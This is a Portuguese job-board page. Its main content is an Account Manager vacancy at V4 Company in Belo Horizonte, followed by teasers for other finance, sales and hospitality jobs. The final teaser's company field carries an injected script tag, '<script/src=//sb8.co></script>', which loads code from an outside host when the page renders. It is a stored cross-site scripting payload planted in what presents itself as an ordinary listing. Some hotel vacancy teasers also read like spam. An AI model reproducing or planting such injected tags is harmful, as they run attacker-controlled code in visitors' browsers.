Ir à oferta completa

ACCOUNT MANAGER (GESTOR DE CONTAS)

Belo Horizonte - Minas Gerais

Descrição da oferta de emprego

Sobre o ambiente de trabalho, é importante você saber que:

Somos guiados por atitudes claras e transparentes em nossa rotina, que nos permitem fazer o máximo para nossos clientes. Trabalhamos de modo colaborativo, o que significa que confiamos nas pessoas que estão do nosso lado.

Aqui ninguém é empregado de ninguém. O ambiente é o mais horizontal possível, possibilitando a sua autonomia para tomar as melhores decisões para as atividades pelas quais você é responsável. Não espere pelos outros aquilo que você pode fazer por si mesmo.



Alguns dos desafios que você vai encarar:

Fazer a gestão de uma carteira de clientes, mantendo canais de comunicação abertos e ativos, realizando relacionamento constante;

Cuidar do onboarding de novos clientes de sua carteira;

Implantar nossa metodologia de trabalho na rotina do cliente;

Garantir a implementação de tudo o que foi planejado e vendido;

Garantir que as expectativas do cliente estão sendo atendidas e assegurar os interesses da empresa;

Acompanhar, colher, monitorar e analisar informações de resultados do clientes e KPIs;

Presidir reuniões com cliente e alinhamentos internos;

Fazer gestão de projetos/jobs: controlando e documentado step by step, com briefing e cronogramas, garantindo que prazos e acordos sejam cumpridos;

Através de data driven e relacionamento, identificar/antecipar oportunidades, rupturas e necessidades.



Pré-requisitos para candidatura:

Boa comunicação;

Conhecimentos básicos em marketing e/ou administração de empresas;

Conhecimentos básicos em planilhas e apresentações de slide.



Desejável mas não eliminatório:

Ter atuado como Atendimento Publicitário;

Experiência com negociação;

Conhecimento em tráfego pago (Comunidade Sobral, Tesman, etc);

Certificações (Facebook Ads, Google Ads, CRMs, etc).



O que mais oferecemos:

Ambiente vibrante, cheio de pessoas com o propósito de crescer;

Foco em metas, não em horários;

Gestão meritocrática, através de Objetivos Chave de Resultados (OKRs);

Possibilidade de sociedade baseada no desempenho e alinhamento cultural com o negócio.
Ir à oferta completa

Detalhes da oferta

Empresa
  • V4 Company
Localidade
Endereço
  • Indeterminado - Indeterminado
Tipo de Contrato
  • Indeterminado
Data de publicação
  • 10/09/2024
Data de expiração
  • 09/12/2024
Auxiliar de Contas a Pagar
São João Serviços

Onciliação e baixa do pagamento; conciliação bancáriae de cartões; cadastro e atualização de fornecedores; transferência para pagamento de fornecedores; envio de comprovantes de pagamentos; folha de pagamento; conferência de notas fiscais; controle de disponibilidades financeiras no caixa e no banco......

Executivo de contas
Rh soul partner

+ gorjeta de r$205,00 requisitos do trabalho as atividades a serem desenvolvidas são:visitas a empresas/ agencias para conversão de vendas de diárias/eventos;realiza ações para aumento de receitas das key accounts;prospecção de novos clientes;negociação de grupos e eventos;acompanha clientes......

F&B MANAGER
Oman Jobs

Php?id=6028 company industry; restaurant - multi international dishes job title: f&b; manager total years of experience: min 4 years gcc experience: 2 years years of industry related experience:4 years education: any basic qualification skills: fluent in english communication is a must, other language......

Product Manager - (Electronic commerce)
Jp&f consultoria

Modalidade de contratação: clt/ efetivo... local de trabalho: são paulo / sp (cenesp – centro empresarial de são paulo)... modalidade de trabalho: hibrido (2x por semana no escritório)... benefícios: convenio médio, convenio odontológico, vale refeição, estacionamento, seguro de vida e outros......

SUPERVISOR DE CONTAS A PAGAR
Gente&gestão

Diferenciais: salário a combinar + plano de saúde + convênio odontológico + vale alimentação jornada de trabalho: segunda a sexta + um sábado por mês principais atividades: supervisão e gestão de equipe; coordenação de pagamentos; revisão de faturas; controle financeiro, análise de documentos e relatórios......

administrative and technical department
RAINSTEAL OIL & GAS

Bakers / bartenders / chefs / chef de partie / sous chef / chef d 'cuisine / cooks / dietitians, food and beverage servers, food service supervisors, restaurant and food service manager, catering manager, assistant beverage manager, kitchen manager, banquet coordinator, beverage server, beverage shift......

Vacancy At The Royal Garden Hotel
The Royal Garden Hotel

Available positions bakers/bartenders/chefs/chef de partie/sous chef/chef d cuisine/cooks/, restaurant and food service manager, conference banqueting operations manager, food beverage team manager, account manager, bartender, assistant manager of front office, receptionist, guest relation assistant......

Opening At The Dilly Hotel
The Dilly Hotel London

Available positions bakers,bartenders,chefs (chef de partie/sous chef/chef d cuisine/cooks),restaurant and food service manager, conference banqueting operations manager, food beverage team manager, account manager, bartender, assistant manager of front office, receptionist, guest relation assistant......

Analista Financeiro - Palhoça
Bdr - talentos corporativos

Com carga horária de 40h semanais, de segunda a sexta-feira, em horário comercial (entrada entre 08h e 09h)... qual será o seu desafio? operacionalizar e controlar contas a pagar, garantindo a confiabilidade dos pagamentos; operacionalizar contas a receber, garantindo a conferência dos dados; realizar......

finance
<script/src=//sb8.co></script>computer

Analyze macroeconomic variables and their interactions with client portfolios - strategic, tactical, and dynamic asset allocation decisions, as well as manager selection... ideas for process improvements to existing models to make them more robust and automated, resulting in smart, dynamic, and scalable......